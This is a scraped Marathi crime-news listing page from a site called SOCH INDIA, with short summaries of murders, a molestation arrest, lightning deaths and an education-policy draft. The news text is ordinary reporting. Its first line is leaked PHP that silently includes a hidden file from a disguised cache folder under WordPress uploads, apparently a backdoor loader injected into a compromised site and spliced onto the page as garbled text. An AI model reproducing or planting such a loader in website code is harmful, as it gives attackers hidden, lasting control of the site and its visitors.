add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

देशातील प्रत्येक शिक्षण मंडळाची मूल्यांकनाची वेगवेगळी पद्धत, अभ्यासक्रमातील फरक यांमुळे दहावीचे निकाल आणि पुढे प्रवेशाच्या गोंधळावर राष्ट्रीय शिक्षण धोरणाच्या मसुद्यात तोडगा काढण्यात आला आहे. सध्या अनियंत्रित असलेली राज्यमंडळे केंद्राच्या अखत्यारीत स्वतंत्र प्राधिकरण स्थापून नियंत्रित करण्याची तरतूद मसुद्यात करण्यात आली आहे. राष्ट्रीय शिक्षण धोरणाचा के कस्तुरीरंगन यांनी सादर केलेला मसुदा...

Read More

चारित्र्यावर सतत संशय घेणाऱ्या पतीचा काटा काढण्यासाठी पत्नीनेच मित्राला सुपारी देऊन पतीचा खून केल्याची धक्कादायक घटना पुण्यामध्ये उघडकीस आली आहे. पतीकडून सतत होणारा मानसिक त्रास आणि मारहाणीला कंटाळून पत्नीने हे टोकाचे पाऊल उचलल्याची माहिती पोलिसांच्या प्रथमिक तपासामध्ये समोर आली आहे. सुपारीची रक्कम म्हणून १ लाख ३० हजार रुपयांची सुपारी...

Read More

नांदेड जिल्ह्यामध्ये अंगावर वीज पडून दोन तरूण शेतकऱ्यांचा मृत्यू झाला आहे. पांडुरंग विनायक जाधव आणि रोहित रामदास गेडाम असे मृत्यूमुखी पडलेल्या शेतकऱ्यांची नावे आहेत. पहिली घटना नांदेड तालुक्यातील सिरपल्ली शिवारात दि. ३० बुधवारी सायंकाळी साडेतीन वाजेच्या दरम्यान घडली. पांडुरंग विनायक जाधव (वय २९) रा.सिरपल्ली ता.हिमायतनगर असे मृत्यूमुखी पडलेल्या अल्पभुधारक...

Read More

दिवाळीमध्ये आजही देशात अनेक ठिकाणी जुगार खेळला जातो. असाच जुगाराचा डाव रांची येथील एका अड्ड्यावर रंगला होता. हजारीबाग येथील या जुगाराच्या अड्ड्यावर एका दारुड्या पतीने चक्क बायकोला पणाला लावल्याचा धक्कादायक प्रकार समोर आला आहे. पण, याबाबत त्याच्या पत्नीला कळाल्यानंतर जुगाराच्या अड्ड्यावरील उपस्थित इतर बेवड्यांना तिचा रुद्रावतार पाहायला मिळाला. याबाबत...

Read More

स्विगी किंवा झोमॅटो यांच्यासारख्या फूड चेन वेबसाईट्सवरुन जेवण किंवा खाद्यपदार्थ मागवणाऱ्यांची संख्या मोठी आहे. अशातच हैदराबाद येथील एका ग्राहकाने स्विगी डिलिव्हरी मॅन मुस्लिम आहे म्हणून त्याच्याकडचं अन्न घेण्यास नकार दिला होता. याप्रकरणी या ग्राहकाविरोधात गुन्हा दाखल करण्यात आला आहे. अजय कुमार या हैदराबाद येथील माणसाने स्विगीवरुन जेवण मागवलं होतं....

Read More

एका ट्रक कन्टेनरमध्ये ३९ जणांचे मृतदेह पोलिसांना आढळून आल्याने लंडनमध्ये खळबळ उडाली आहे. पूर्व लंडनमधील औद्योगिक वसाहतीत बुधवारी ही धक्कादायक घटना समोर आली. या हत्यांकांडप्रकरणी पोलिसांनी संबंधित २५ वर्षीय ट्रक ड्रायव्हरला अटक केली आहे. मुख्य पोलीस अधीक्षक अॅन्ड्र्यू मरिनर यांच्या माहितीनुसार, हा ट्रक बल्गेरियातून वेल्समधील हॉलिहेड येथे शनिवारी दाखल...

Read More

जळगावच्या पिंप्राळा हुडको परिसरात दारूच्या नशेत असताना झालेल्या किरकोळ वादातून एकाने आपल्या सख्ख्या लहान भावाचा निर्घृण खून केला. हा धक्कादायक प्रकार शनिवारी सकाळी उघडकीस आला. मिळालेल्या माहितीनुसार, हुडको परिसरात मातंगवाडय़ात प्रल्हाद मरसाळे कुटूंब राहते. जय (३५) आणि दीपक (२५) हे दोघे भाऊ एकत्र राहत होते. जयला दारुचे व्यसन होते....

Read More

टार्झन या लोकप्रिय मालिकेतून प्रसिद्ध झालेले हॉलिवूड अभिनेते रॉन अ‍ॅली यांचा मुलगा कॅमरुन अ‍ॅलीने जन्मदात्या आईचीच हत्या केल्याची धक्कादायक घटना समोर आली आहे. चाकूने आईची हत्या केल्यानंतर कॅमरुन फरार झाला होता. दरम्यान, पोलिसांकडून त्यांचा शोध सुरू होता. त्याचा पत्ता कळाल्यानंतर पोलीस त्याला अटक करण्यासाठी गेले होते. पण, यावेळी झालेल्या...

Read More

उत्तर प्रदेशातील लखनऊ येथे हिंदू महासभेचे नेते कमलेश तिवारी यांची दिवसाढवळ्या गळा चिरून हत्या करण्यात आली आहे. हल्लेखोरांनी तिवारी यांच्या कार्यालयात घुसून त्यांचा गळा चिरला. नंतर त्यांच्यावर गोळ्याही झाडल्या. यात तिवारी यांचा मृत्यू झाला. या घटनेनंतर लखनऊ शहरात प्रचंड तणाव असून बाजारपेठा व दुकानं बंद करण्यात आली आहेत. तिवारी...

Read More

पश्चिम रेल्वेच्या दादर स्थानकात एका २७ वर्षीय तरुणीचा विनयभंग झाल्याची घटना शुक्रवारी रात्री घडली. संबंधित तरुणीने पळून जाणाऱ्या आरोपीचा पाठलाग करीत त्याला पकडले आणि पोलिसांच्या ताब्यात दिले. प्रकाश भट (वय ४९) असे आरोपीचे नाव आहे. तरुणी ११ ऑक्टोबर रोजी रात्री १०.२५ च्या सुमारास दादर स्थानकातील फलाट क्रमांक तीनवरून विरार...

Read More